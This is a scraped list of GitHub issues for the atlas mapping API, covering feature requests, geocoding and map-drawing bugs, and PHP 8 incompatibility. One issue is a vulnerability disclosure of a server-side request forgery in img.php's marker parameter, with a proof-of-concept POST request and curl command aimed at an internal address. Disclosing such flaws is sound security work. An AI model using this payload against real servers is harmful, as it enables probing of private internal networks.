aaronpk / atlas Goto Github PK

To allow for external attribution image to be passed through, as you currently allow a marker image URL to be passed through.

As we discussed:
Living close to the border, Atlas gives the wrong address for my home location. It seems to be a problem with the &distance=10000 parameter on the API call to geocode.arcgis.com.

This was originally used to get a location in area's where there was no address found, extending the search area by 10km.

The solution would be to first make a request without the parameter, and only if it returns empty, fetch with the 10km distance param.

You can check the API-calls with coordinates for my home address in this private post, if you need testing.

Publish a zip file including the vendor folder containing dependencies so you can unzip it and run it without needing to use composer.

I'd like a feature where I submit a date and local time (without a timezone) and get, if possible, the timezone for this time and/or a fully tz-aware timestamp.

This is a bit ugly since it has edge cases: timestamps can either not be valid or ambigious, e.g. when they fall in a DST switch. For me, erroring out would be acceptable behavior in both cases.

Right now the map is always drawn with -180 on the left. When a line spans for example Tokyo to LA, the line is drawn the wrong way instead of crossing the -180 line.

• Pick a better center for the map
• Wrapping the map tiles around the -180 line
• Draw path lines crossing the -180 line

Adding a couple lines similar to curl_setopt($chs[$x][$y], CURLOPT_FOLLOWLOCATION, true); in just the right places seems to do the trick.

Found out after I got a server error. There's actually a comment in the code that reads // In case any of the tiles fail, they will be grey instead of throwing an error: this is not quite true; in this case, the response is non-empty (it is a 301 error/redirect page), causing imagecreatefromstring() to run but return false. This in turns leads to a fatal error when imagesx($tile) gets called: imagesx(): Argument aaronpk/Static-Maps-API-PHP#1 ($image) must be of type GdImage, bool given.

Not sure if this library is still maintained, just thought I'd leave this here anyhow.

with URL parameters like lat/lng to be able to quickly create a URL that loads a map pin at a certain location

given a lat/lng, return information about the current weather at that location:

• temperature
• humidity
• pressure
• "feels like" temperature
• wind / wind gust
• rain in the last hour
• icon URL that represents current state (cloudy, raining, sunny, etc)

Use weather icons from https://erikflowers.github.io/weather-icons/

Weather data from wunderground

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: latest
Test with PHP 7.2

The vulnerable code is located in the curl_init function of the img.php file, which does not sufficiently validate the marker parameter, leading to a taint introduced from the $markersTemp variable in the img.php file and eventually into the tainted function curl_init, where the curl_exec function After execution, a request is sent to the URL specified by the marker parameter, eventually leading to an SSRF vulnerability.

......
if($markersTemp=request('marker')) {
  if(!is_array($markersTemp))
    $markersTemp = array($markersTemp);
......
        if(preg_match('/https?:\/\/(.+)/', $properties['icon'], $match)) {
          // Looks like an external image, attempt to download it
          $ch = curl_init($properties['icon']);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          $img = curl_exec($ch);
......

Because the marker parameter is unrestricted, it is also possible to use the server-side to send requests, such as probing intranet web services. The corresponding PoC is as follows

POST /img.php HTTP/1.1
Host: 172.16.119.1:81
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: close

marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123

You can also use the following curl command to verify the vulnerability

curl -i -s -k -X $'POST' \
    -H $'Host: 172.16.119.1:81' -H $'Content-Length: 61' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
    --data-binary $'marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123' \
    $'http://172.16.119.1:81/img.php'

Possibly an issue with Savant3 dependency not being compatible with PHP 8. Running the application produces this error:

Fatal error: Uncaught ValueError: func_get_arg(): Argument #1 ($position) must be less than the number of the arguments passed to the currently executed function in 
/app/vendor/saltybeagle/savant3/Savant3.php:901

Stack trace:
#0 /app/vendor/saltybeagle/savant3/Savant3.php(901): func_get_arg(1)
#1 /app/vendor/p3k/slim-savant/Savant.php(74): Savant3->assign(Array)
#2 /app/vendor/slim/slim/Slim/View.php(255): Slim\Extras\Views\Savant->render('layout.php', Array)
#3 /app/vendor/slim/slim/Slim/View.php(243): Slim\View->fetch('layout.php', NULL)
#4 /app/vendor/slim/slim/Slim/Slim.php(755): Slim\View->display('layout.php')
#5 /app/vendor/p3k/slim-savant/SlimSavant.php(19): Slim\Slim->render('layout.php', Array)
#6 /app/controllers/main.php(5): Slim\Savant\render('index')
#7 [internal function]: {closure}()
#8 /app/vendor/slim/slim/Slim/Route.php(468): call_user_func_array(Object(Closure), Array)
#9 /app/vendor/slim/slim/Slim/Slim.php(1355): Slim\Route->dispatch()
#10 /app/vendor/slim/slim/Slim/Middleware/Flash.php(85): Slim\Slim->call()
#11 /app/vendor/slim/slim/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call() 
#12 /app/vendor/slim/slim/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
#13 /app/vendor/slim/slim/Slim/Slim.php(1300): Slim\Middleware\PrettyExceptions->call()
#14 /app/public/index.php(12): Slim\Slim->run()
#15 {main} thrown in /app/vendor/saltybeagle/savant3/Savant3.php on line 901

There may be other such incompatibility issues lurking in dependencies or in the apps own code.

PHP 7.x is no longer maintained and has reached end of life. One way this manifests itself is that versions below v8 are disabled in Brew, and not supported by tools like Nixpicks.